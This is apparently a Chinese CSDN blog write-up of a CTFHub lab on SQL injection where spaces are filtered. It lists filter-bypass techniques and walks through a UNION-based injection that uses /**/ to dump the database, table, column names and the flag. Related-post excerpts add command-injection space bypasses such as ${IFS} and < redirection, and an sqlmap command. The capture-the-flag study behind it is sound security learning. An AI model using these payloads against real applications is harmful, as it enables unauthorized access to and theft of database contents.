过滤空格(ctfhub)

最新推荐文章于 2024-04-10 22:04:16 发布
最新推荐文章于 2024-04-10 22:04:16 发布
阅读量384 收藏 4
点赞数 4
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_82985722/article/details/137286063
版权

过滤空格

常见过滤方法

注释过滤    /**/、/*!*/、//、#、--    

?id=-1/**/union/**/select/**/1,2

括号过滤    ()    

?id=-1(union)select(1,2)

符号过滤    %00、%09、%20、%a0 %0a、%0b、%0c、%0d    

?id=-1%a0union%a0select%a01,2

引号过滤     ' 、 "   

?id=-1 union select '1', '2'

大小写过滤    大小写  

?id=-1/**/UnIoN/**/SeLeCt/**/1, 2

双关键字绕过    '+'    

?id=-1 uni'+'on sel'+'ect 1,2#

正则表达式绕过    \s、\s*  

?id=-1 union\s+select\s+1\s*,\s*2

\s+ 表示匹配一个或多个空白字符,\s* 表示匹配零个或多个空白字符。

原文链接:CTFHub | 过滤空格_ctfhub过滤空格-CSDN博客

1.查看注入点,判断为数字型注入

2.查询列数,有空格时报错

 通过注释/**/取代空格     

?id=1/**/order/**/by/**/2

得到列数为2列

3.查询回显位置

union联合注入,查看未发现的数据

?id=-1(0)可以查看到不存在数据库中的数据

?id=-1/**/union/**/select/**/1,2

4.爆数据库

?id=-1/**/union/**/select/**/1,database()

5.爆数据表

?id=-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'

6.爆字段

?id=-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema='sqli'/**/and/**/table_name='cjlrfnakht'

7.爆出flag

?id=-1/**/union/**/select/**/1,group_concat(bhzmjkjoza)/**/from/**/sqli.cjlrfnakht

LLINELL
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Js过滤空格的实现代码
10-27
在JavaScript中,过滤空格是一项常见的任务,尤其是在处理用户输入或者格式化文本时。通过JavaScript进行空格过滤,我们可以减少服务器的负担,因为这可以在客户端完成,而不必等待数据发送到服务器并返回处理结果。...
javascript用正则表达式过滤空格的实现代码
10-22
下面小编就为大家带来一篇javascript用正则表达式过滤空格的实现代码。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
CTFhub-RCE-过滤空格
ssss39的博客
11-16 346
IFS在linux下表示分隔符,但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,因此这里加一个{}就固定了变量名。同理,在后面加个$可以起到截断的作用,使用$9是因为它是当前系统shell进程的第九个参数的持有者,它始终为空字符串。< 、>、、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等。2. 查看 flag_890277429145.php。1. 查看当前目录:127.0.0.1|ls。
CTFHub | 过滤空格
尼泊罗河伯的博客
12-04 2413
根据网页显示内容提示,这题关于过滤空格注入,此题和其他的注入手法一致,只不过需要在网页 URL 中对 payload 语句中的空格符号进行过滤,判断发现此题存在过滤空格注入,接着判断字段数量,查看数据库位置和版本。使用注入常用流程爆库、爆表、爆数据。最后获得此题 flag 。
CTFHUB-技能树-Web题-SQL注入-Mysql结构-过滤空格
Static______的博客
04-10 438
得到数据库名为sqli,根据当前数据库名得到数据库下的表名。注:%09 %0A %0D +据说也可以替代空格。得到第一张表中的字段名,根据字段名获取数据。由此判断字段数为2(当前表的列数为2)得到两张表名,尝试查看第一张表的数据。
CTFHub-过滤空格
m0_51589948的博客
05-19 694
过滤空格 在输入正常的数字时发现页面不发生回显,但是当用/**/过滤空格时发现页面可以回显并且能生出信息 可以判断该注入应为空格过滤,将所有的空格转化为//后进行查询flag,查询库名 -1//union//select//database() 查询该库名下的数据表 -1//union//select//1,group//select(table_name)//from//information_schema.tables//where//schema_table=‘sqli’ 得出表名为news
ctfhub-过滤空格
m0_62094846的博客
12-15 909
<?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/ /", $ip, $m)) { $cmd = "ping -c 4 {$ip}"; exec($cmd, $res); } else { $res = $m; }...
CTFhub 过滤空格
plant1234的博客
06-18 935
过滤空格: 首先这题,我们得知道用/**/来代替我们语句中的空格 进行注入 首先启动环境用: 1' 1'/**/and/**/1=1# 1/**/and/**/1=1 1/**/and/**/1=2 测出是否有注入 然后就报出库名: 520/**/union/**/select/**/1,database() 在报出表名: 在报出字段: 在报出内容得到flag: ...
一个js过滤空格的小函数
10-25
标题中的"一个js过滤空格的小函数"指的是在JavaScript中编写的一个简单函数,用于移除字符串中的空格。这个功能在某些场景下非常有用,比如在用户注册页面,可以防止用户输入带有空格的用户名或密码,从而减轻服务器...
js过滤空格代码
10-10
过滤空格代码
过滤连续空格
12-18
输入一句话,里面含有多个空格,一次遍历将多个连续空格变成一个空格
CTFhub】命令注入—过滤空格
manerzi的博客
10-25 645
CTFhub】命令注入—过滤空格
CTFHUB-过滤空格
Web学习之路
03-28 266
替换
CTFHub_技能树_Web之RCE——“过滤空格
Ho1aAs‘s Blog
07-28 966
文章目录使用工具解题过程完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 解题过程 查看网页显示的源码,和之前的一样,只是过滤空格 空格的表示方法 cat<file cat<>file cat${IFS}file 先查询 后打开 注意:FLAG藏在注释里,不是明文表示 完 欢迎在评论区留言 感谢浏览 ...
CTFHub-空格过滤-wp
z1moq的博客
05-18 246
空格过滤 **原理:**在php中提前写好当输入字符中有空格时返回 “Hacker!!!” 来防止sql注入 空格为空字符,可用php中的多行注释/**/来代替空格,以正常执行sql语句 剩余做法与整数型注入相同
CTF 代码审计之绕过过滤的空白字符
天泽岁月
08-31 915
ctf空白字符
CTFHub题解-技能树-Web(SQL注入-过滤空格
weixin_51706044的博客
06-06 713
文章目录前言过滤空格SQLmap 前言 在本文中将会采用两种注入手法:SQLmap和手注,当然记录这篇文章主要是对SQLmap的使用进行一下学习 过滤空格 既然是过滤空格,绕过空格的方法: 1、/**/ 2、() 3、%0a SQLmap 对于SQLmap的使用可以参考该笔者的文章 一、爆数据库 python sqlmap.py -u "http://challenge-ba6a5630047ce20b.sandbox.ctfhub.com:10800/?id=1" --dbs --tamper
CTFHub技能树web(持续更新)--RCE--命令注入--过滤空格
jiuyongpinyin的博客
01-26 664
过滤空格 这次过滤空格,使用ls查看当前目录: 127.0.0.1&ls 发现了一个php文件,因为空格过滤了,我们可以使用 < 或 <> 重定向符来代替空格: 127.0.0.1&cat<flag_3199012005565.php 然后查看网页源代码,得到flag: 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正 ...
CTFHub 过滤空格
最新发布
06-12
CTFHub 是一个网络安全技术社区和平台,它可能提供各种挑战(Challenge)和资源,包括渗透测试、夺旗赛(Capture the Flag, CTF)题目等。在使用 CTFHub 时,"过滤空格"通常指的是在输入或输出数据处理过程中,去除字符串中的多余空白字符,比如空格、制表符或换行符,以便正确解析或展示给用户。这在编程中常见于数据格式化、字符串操作或者接收用户输入时。 例如,在处理用户提交的代码片段或字符串谜题答案时,服务器可能需要将所有空格去掉,以确保程序的预期行为不因为输入格式的变化而受影响。这样做的目的是为了提高代码执行的准确性和一致性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值